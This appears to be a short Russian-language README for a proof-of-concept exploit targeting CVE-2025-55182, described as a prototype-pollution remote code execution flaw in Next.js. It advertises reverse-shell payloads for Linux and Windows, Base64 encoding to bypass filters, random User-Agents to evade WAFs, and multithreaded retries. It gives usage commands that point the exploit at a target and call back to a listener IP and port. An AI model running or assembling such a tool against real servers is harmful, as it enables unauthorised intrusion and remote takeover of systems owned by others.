
Poc для CVE-2025-55182
CVE-2025-55182 — это критическая уязвимость загрязнения прототипа в nextjs, которая позволяет выполнение удаленного кода (RCE) через неправильную санитацию ввода в механизме обработки запросов фреймворка. Вся проблема в том, что nextjs доверяет JSON-объектам как наивный новичок.
1) Загрязнение прототипа при разборе запросов: nextjs неправильно санирует объекты, которые могут загрязнить цепочку прототипов
2) Небезопасная десериализация: фреймворк позволяет JSON-объектам изменять прототипы базовых объектов
3) RCE через child_process путем загрязнения цепочки прототипов: как только прототип загрязнен, мы можем перехватить логику и заставить сервер выполнять код
npm create [email protected] vuln
1) Полезные нагрузки Reverse Shell: Linux/Win обратные оболочки
2) Кодирование Base64 для обхода фильтров
3) Автоматическое определение ОС
4) Случайные User-Agent для уклонения от WAF
5) Циклы повторных попыток в случае сбоя с экспоненциальной задержкой
6) Многопоточность для параллельных попыток эксплуатации для надежности
python exp_v2.py target 192.168.1.69 9001 --base64
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3
python exploit.py target.com 192.168.1.69 9001 --no-spoof